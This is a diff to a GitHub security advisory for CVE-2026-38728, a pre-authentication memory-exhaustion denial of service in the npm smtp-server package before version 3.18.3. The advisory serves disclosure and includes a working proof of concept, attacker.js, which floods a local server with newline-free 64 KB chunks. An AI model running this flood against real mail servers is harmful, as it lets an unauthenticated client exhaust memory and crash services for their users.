github · blue2cat · May 15, 2026 · May 15, 2026
diff --git a/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json b/advisories/unreviewed/2026/05/GHSA-fv2f-rw9f-v9cm/GHSA-fv2f-rw9f-v9cm.json
@@ -1,19 +1,40 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-fv2f-rw9f-v9cm",
-  "modified": "2026-05-15T18:30:33Z",
+  "modified": "2026-05-15T18:31:38Z",
   "published": "2026-05-15T15:30:45Z",
   "aliases": [
     "CVE-2026-38728"
   ],
-  "details": "An issue in Nodemailer smtp_server before v.3.18.3 allows a remote attacker to cause a denial of service via the SMTPStream._write, lib/smtp-stream.js components",
+  "summary": "Memory Exhaustion DoS in smtp-server's Command Parser",
+  "details": "### Summary\n\nAn unauthenticated memory exhaustion denial-of-service vulnerability in `smtp-server`'s command parser allows any remote client to consume unbounded server memory by sending data without newline characters. The server's `_remainder` buffer in `SMTPStream._write` grows without limit, leading to heap exhaustion, prolonged GC pauses that freeze the event loop, and in some cases, process crash. \n\n### Details\n\nThe `_write` method in `lib/smtp-stream.js` appends incoming TCP chunks to `this._remainder` in command mode. The buffer is only emptied when a newline is found. If a client never sends a newline, the `_remainder` value will grow indefinitely, causing excess memory consumption.\n\n### PoC\n\n**test_server.js**\n\n```js\nimport { SMTPServer } from \"smtp-server\";\n\nconst server = new SMTPServer({ authOptional: true, logger: false });\n\n\nserver.listen(2527, '127.0.0.1', () => {\n    console.log('listening on 2527');\n    \n    let tick = 0;\n    setInterval(() => {\n        const mb = (process.memoryUsage().rss / 1024 / 1024).toFixed(1);\n        console.log(`tick=${++tick}  RSS=${mb} MB`);\n    }, 1000);\n});\n\nserver.on('error', err => { console.error(err.message); process.exit(1); });\n```\n\n**attacker.js**\n\n```js\n\nimport net from 'node:net';\n\nconst buff_chunk = Buffer.alloc(64 * 1024, 0x41);\nconst socket = net.createConnection(2527, '127.0.0.1');\n\nsocket.once('data', flood);\n\nfunction flood() {\n    const ok = socket.write(buff_chunk);\n    if (ok) setImmediate(flood);\n    else socket.once('drain', flood);\n}\n\nsocket.on('error', err => console.error(err.message));\n\n```\n\n\n### Impact\n\nWho is impacted: Any application using the `smtp-server` npm package to accept SMTP connections on a public interface. This attack occurs before authentication, so authenticated services offer no protection. \n\nSeverity: High. A single connection can exhaust the process memory, while multiple connections multiply the effect linearly. The attack is trivial to execute. ",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "smtp-server"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.18.3"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",